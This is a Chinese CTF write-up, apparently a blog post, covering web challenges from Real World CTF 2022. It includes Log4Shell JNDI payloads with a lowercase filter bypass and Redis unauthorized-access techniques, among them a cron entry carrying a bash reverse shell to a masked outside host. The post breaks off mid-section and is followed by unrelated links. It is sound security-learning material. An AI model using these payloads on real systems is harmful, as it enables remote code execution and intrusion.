文章目录

  • Real World CTF 2022(体验赛)
  • Digital Souvenir
  • log4flag
  • Be-a-Database-Hacker
  • the Secrets of Memory
  • baby flaglab
  • Flag Console
  • Ghost Shiro

Real World CTF 2022(体验赛)

周末打了一下Real World CTF体验赛,据说难度比正赛降简单很多,比赛时间连续24小时,赛题类型涵盖Web/Pwn/Crypto/Reverse/Blockchain/Virtual Machine/Browser/IoT/Kernel 等等。
但是本次比赛解题方式和一般CTF不太一样,基本上都是通过CVE漏洞GETshell,与实战更为贴近。
本次比赛做的题都是Web题,简单记录一下,加深学习。如有问题请各位大佬指教。
本次比赛环境需要先访问指定端口,进行PoW(工作量证明),服务端给出Hash值前几位,需要在一定时间内提交满足条件的明文。比赛方给了参考的PoW脚本,参数跟上指定端口跑一下就行,成功之后会给你一个新的端口,访问这个端口即可进入比赛题目。注意的是每次生成心得环境存活时间600s,经常做着做着环境就挂了。。。重新跑一下就可以了。

Digital Souvenir

签到题,「解出赛题的战队」和「直播间参与互动的观众」,可以领取Real World CTF赛事定制的数字纪念品,去数字纪念品相关介绍页面,找到flag提交即可。

log4flag

看到题目名称就猜想到应该是log4j的RCE漏洞,打开题目是一个登录框:

试着构造一下exp:
${jndi:ldap://xx.xx.xx.xx:xx/}
发现返回参数错误,以admin/admin登录,返回登录失败,猜想可能过滤了关键字符,经过多次尝试发现过滤的是jndildap关键字。
或者下载题目附件,通过反编译查看代码,也可得知过滤器的过滤逻辑:

那么就需要进行过滤规则的绕过,采用lower case即可绕过:
${${lower:j}ndi:${lower:l}dap://xx.xx.xx.xx/}
vps起ldap和http服务:

即可拿到flag:

Be-a-Database-Hacker

这道题查看dockerfile文件,可以得知以下几点:

  1. 本题环境是一个redis服务,且版本号位4.0.14
  2. flag文件存放在/tmp/flag.txt
  3. redis服务是以redis用户启动的,即非root用户
FROM redis:4.0.14
COPY flag.txt /tmp/flag.txt
RUN chown redis:redis /tmp/flag.txt

通过redis-client可以直接成功连接,存在redis的未授权访问,但没有其他可用的信息。
redis的未授权访问漏洞,常见利用方式有以下几种,这里总结一下:

1. 写计划任务

set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/xx.xx.xx.xx/xxxx 0>&1\n\n"
config set dir "/var/spool/cron"
config set dbfilename root
save

但是更改本地存放目录dir时失败,因为redis服务是以非root用户启动的,权限不够。
2. 写ssh公钥

config set dir /root/.ssh
config set dbfilename authorized_keys

同样更改本地存放目录失败,权限不够。

3. 写webshell
就没有web服务,上哪写webshell

Real World CTF 2022(体验赛)部分WP相关推荐

  1. 强网杯2021 ctf线上赛ezmath wp(#超详细,带逆向新手走过一个又一个小坑)

    文章目录 引言 一.分析文件类型 二.初步分析 1 运行情况 2 IDA初步分析 三.详细分析 1 sub_13F3函数分析 2 查找蛛丝马迹 (1)mprotect (2)重写unk_2010 3 ...

  2. 赛宁网安-r3kapig联合战队冲击DEF CON CTF 2022总决赛

    1993年,DEF CON黑客大会正式创办,第一届DEF CON CTF则始于1996年,是全球同类赛事中最具影响力的赛事之一,在圈内有着"黑客世界杯"的美誉. DEF CON C ...

  3. Newstar Ctf 2022| week2 wp

    Newstar Ctf 2022| week2 wp Newstar Ctf 2022第二周题目的wp. 文章目录 Newstar Ctf 2022| week2 wp Crypto unusual_ ...

  4. decode判断不为空拼接_空指针4月内部赛官方WP

    本次内部赛含WEB跟RE题目各一道,其中RE题目7人解出,WEB题目1人解出,恭喜以上选手. 下面放上本次内部赛的WP. RE题目由于前几次的空指针题目太难了,所以这次出了一道较为简单的题(要不然每次 ...

  5. 【蓝桥杯】 三行代码解决 “全排列的价值”(2022省赛pythonA组)

    三行代码解决 "全排列的价值"(2022省赛pythonA组) 置顶代码: from math import factorial n = int(input()) print(fa ...

  6. 2019UNCTF-竞技赛 部分WP

    2019UNCTF-竞技赛 部分WP emmmm,比赛结束了,,,, 无奈本人太菜,只能做几个题,,,, flag部分白嫖,部分靠混,,,, web checkin 直接白嫖~~,nodejs注入,而 ...

  7. 【数学建模】2022亚太赛A题 结晶器熔炼结晶过程序列图像特征提取与建模分析

    2022亚太赛A题 1 前言 2 问题重述 3 问题一 3.1 数据处理 3.1.1 图像裁剪 3.1.2 提取红色部分 3.2 汉字提取 3.2.1 失败的例子 3.2.2 正确的例子 4 问题二 ...

  8. 【2022国赛官方评审要点发布】2022高教社杯全国大学生数学建模竞赛官方评阅要点

    [2022国赛官方评审要点发布]2022高教社杯全国大学生数学建模竞赛官方评阅要点 文章目录 2022年A题评阅要点 问题1 问题2 问题3 问题4 2022年B题评阅要点 问题1 问题2 2022年 ...

  9. 2022国赛论文及可运行代码

    2022数学建模国赛各题分析 A题分析 A题大方向:微分方程.机理分析.动力系统.参数拟合.数据矫正.非线性优化.误差分析.精度分析 国赛前主要看这几个方面的论文 热问题(热传递,热扩散,热对流) 航 ...

最新文章

  1. 激光雷达,马斯克看不上,却又无可替代?
  2. 跨语言平台的RSA加密、解密、签名、验证算法的实现
  3. Jquery_JQuery之DataTables强大的表格解决方案
  4. 图像正确(相当于这个小项目就要结尾了)
  5. word的公式后加编码后自动变小
  6. vsftpd:500 OOPS: vsftpd: refusing to run with writable root inside chroot ()错误的解决方法
  7. VMware vSAN分布式存储安装配置
  8. L2-1 包装机 (25 分)
  9. python date2num_坚持mdates.date2num
  10. 腾讯信息流推荐业务实践:内容分发场景的多目标架构实践
  11. IOS开发之支付功能概述
  12. Pannellum:实例之自动加载全景图
  13. Nokia手机S40平台手机开发环境的搭建的过程
  14. 医疗管理系统(Java毕业设计-Springboot项目)
  15. SQL SERVER 实用教程(第四版) 实验 1-10 非标准答案
  16. 【渝粤教育】电大中专消费者行为学30分钟交卷(1)作业 题库
  17. DSPE-PEG-SP94/APRPG/蛋白多肽/TH/TAT 穿膜肽/R8/RGD/HAIYPRH/KRWWKWWRR 磷脂-聚乙二醇-多肽定制
  18. Storm体系结构和概念解释
  19. 计算机毕业设计(论文+代码+数据库+查重)
  20. 【noi.ac#1771】ball

热门文章

  1. javascript基础知识大全
  2. 字节跳动视频架构(一面面经)
  3. 拥有管理员权限但hosts文件无法修改的问题
  4. Excel批量删除含有某关键字的多个工作表
  5. python随机抽人小程序_python抽人程序初试
  6. 云呐|教育卫生行业固定资产管理系统软件流程
  7. 大数据时代如何建设动漫品牌
  8. BCGSoft BCGControlBar
  9. 我的世界服务器显示参数,我的世界server.properties怎么设置 联机参数设置图文教程[图]...
  10. Bootstrap屏幕缩小时在导航栏下生成滚动条